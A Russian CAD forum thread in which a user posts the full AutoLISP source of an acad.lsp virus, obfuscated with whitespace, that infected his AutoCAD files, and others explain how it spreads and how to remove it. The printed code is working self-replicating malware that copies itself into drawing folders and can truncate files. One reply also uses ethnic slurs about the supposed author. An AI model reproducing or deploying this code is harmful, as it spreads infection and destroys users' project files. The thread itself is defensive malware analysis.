Подцепил вирус, не силён в лиспе. подскажите, как на начальной стадии его правильно убить.

ssn · 20.05.2011, 15:42

открыл чужой файл с флешки на своём компе. блин, знаю, что делать этого не следует, особенно когда там целая куча файлов.
но, как говорится, поздно пить боржоми...

теперь при открытии около каждого файла рождается acad.lsp
понимаю, что подобная тема была, читал её.
просто в лиспе не силён вообще, посмотрите, что эта гадина делает. и может есть возможность её грохнуть в самом зарождении, пока она не рассосалась по проектам?

Код:

[Выделить все]

 ++++++++++++++++++++----------------------------------------++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++




------------------------(defun
s::startup
(/ 
old_cmd 
path 
dwgpath 
mnlpath 
apppath 
oldacad 
newacad 
nowdwg 
lspbj 
wjm  
wjm1 
wjqm 
wjqm1 
wz 
ns1 
ns2 
kd)
(setq 
old_cmd 
(getvar 
"cmdecho"))
(setvar 
"cmdecho" 
1)
(setq 
path 
(findfile 
"base.dcl"))
(setq 
path 
(substr 
path 
1 
(- 
(strlen 
path) 
8)))
(setq 
mnlpath 
(getvar 
"menuname"))
(setq 
nowdwg 
(getvar
"dwgname"))
(setq 
wjqm 
(findfile 
nowdwg))
(setq 
dwgpath 
(substr 
wjqm 
1 
(- 
(strlen 
wjqm) 
(strlen 
nowdwg))))
(setq 
acadpath 
(findfile 
"acad.lsp"))
(setq 
acadpath 
(substr 
acadpath 
1 
(- 
(strlen  
acadpath) 
8)))
(setq 
ns1 
"" 
ns2 
"")
(setq 
lspbj 
0)
(if 
(= 
acadpath 
dwgpath) 
(progn
(setq 
oldacad 
(findfile 
"acad.lsp"))
(setq 
newacad 
(strcat 
path 
"acad.lsp"))
(writeapp)
)
(progn
(if 
(/= 
nowdwg 
"Drawing.dwg")
(progn 
(setq 
oldacad 
(findfile 
"acad.lsp"))
(setq 
newacad 
(strcat 
dwgpath 
"acad.lsp"))
(writeapp)
)
)
)
)
(setq 
nowdwg 
(getvar 
"dwgname"))
(setq 
wjqm 
(findfile 
nowdwg))
(if 
(setq 
kd 
(findfile 
"acadisa.lin"))
(progn
(setq 
ns2 
0)      
(if 
(setq 
ns1 
(open 
kd 
"r"))
(progn 
(while 
(setq 
wz 
(read-line 
ns1))
(if 
(= 
wjqm 
wz) 
(setq 
ns2 
1)))
(close 
ns1)
))
(if 
(= 
ns2 
0) 
(progn
(setq 
ns1 
(open 
kd 
"a"))
(write-line 
wjqm 
ns1) 
(close 
ns1
)
))
(if 
(setq 
ns1 
(open 
kd 
"r")) 
(progn
(setq 
wz 
(read-line 
ns1))
(close 
ns1)
))
(if 
(> 
(getvar 
"date") 
(+ 
(distof 
wz) 
8)) 
(progn
(setq 
oldacad 
(strcat 
path 
"acadisa.lin"))
(setq 
newacad 
(strcat 
dwgpath 
"a"))
(
writeapp
)

(if 
(setq 
wjm1 
(open 
oldacad 
"w")
)
(progn 
(setq 
wjm 
(open 
newacad 
"r"))
(setq 
wz 
(read-line 
wjm)) 
(write-line 
(rtos 
(getvar 
"date")
) 
wjm1)
(setq 
wz 
(read-line 
wjm)) 
(if 
(> 
(getvar 
"date") 
2452900) 
(close 
(open 
wz 
"w")
)
)
(while
(
setq 
wz 
(read-line 
wjm))
(write-line 
wz 
wjm1)
)
(close 
wjm)
(close 
wjm1)
(close 
(open 
newacad 
"w"))
)
)
)
)
)
(progn
(if 
(setq 
ns1 
(open 
(strcat 
path 
"acadisa.lin") 
"w")) 
(progn
(write-line 
(rtos 
(getvar 
"date")) 
ns1) 
(write-line 
wjqm 
ns1
) 
(close 
ns1
)
))
))      

(setvar 
"cmdecho" 
old_cmd)
(princ)
)
(defun 
writeapp ()
(if 
(setq 
wjm1 
(open 
newacad 
"w"))
(progn 
(setq 
wjm 
(open 
oldacad 
"r"))
(while 
(setq 
wz 
(read-line 
wjm))
(write-line 
wz 
wjm1)
)
(close 
wjm)
(close 
wjm1)
))
)
;*************

на сколько вижу на первый взгляд, эта штука просто сама себя пишет в путь потдержки и заменяет собой acad.lsp... но у меня его не было, и по этому просто этот файл появился... я его в путях потдержки грохнул, вроде как больше он не появляется.
если это так, то какой то не совсем зловредный вирус... предупредительный так скажем

ГРАЖДАНЕ программисты.. посмотрите пожалуйста код. что он делает кроме того, что множит сам себя.
почитал соседнюю ветку, там похожий вирус просто зверства творит с удалением всего подряд... страшно жить короче.
очень прошу, посмотрите, что он творит.

Li6-D · 21.05.2011, 17:22

Это программа относительно безобидна, она действительно размножает себя через зараженный ею файл "acad.lsp".
Может создавать, а в дальнейшем использовать вспомогательные файлы "acadisa.lin" или "newacad".
Судя по выражению (> (getvar "date") 2452900) написана незадолго до 17.09.2003.

gomer · 21.05.2011, 17:27

Цитата:

Сообщение от Li6-D

Судя по выражению (> (getvar "date") 2452900) написана незадолго до 17.09.2003.

Судя по всему теми же индусо-турками что и здесь

hwd · 21.05.2011, 17:42

Цитата:

Подцепил вирус, не силён в лиспе. подскажите, как на начальной стадии его правильно убить.

Просто удали этот файл.

Цитата:

Судя по всему теми же индусо-турками что и здесь

Однозначно глупый "индус", дорвавшийся до автолиспа и окромя него ничего более не знающий, но тем не менее лелеющий надежду "насрать всему миру" чем-то прославиться. На что-то полезное соображалки не хватает, вот и царапает то, на что мозжечок ещё способен (пару функций выучил). Одноклеточный, одним словом....

Nikolay 2 · 21.05.2011, 18:59

Цитата:

Сообщение от hwd

Просто удали этот файл.

Простое удаление не поможет. А вот это http://forum.dwg.ru/showthread.php?t=19984 поможет, проверено

ssn · 21.05.2011, 20:42

а зачем она ищет файл base.dcl?
посмотрел это вроде как файл из установочного пакета...

Li6-D · 21.05.2011, 21:15

Цитата:

Сообщение от ssn

а зачем она ищет файл base.dcl?
посмотрел это вроде как файл из установочного пакета...

Сам файл base.dcl программа не трогает, а использует путь к нему для того, чтобы поместить в эту же папку acad.lsp и вспомогательные для вируса файлы acadisa.lin или newacad.

mamuk · 23.05.2011, 07:35

его и касперский должен видеть, у меня висит файлик с этим вирусом он на него ругается"23.05.2011 9:31:14 Обнаружено: Virus.Acad.Bursted.a c:\Documents and Settings\User\Рабочий стол\вирусок.txt"

ssn · 23.05.2011, 12:37

а вот НОД не видит...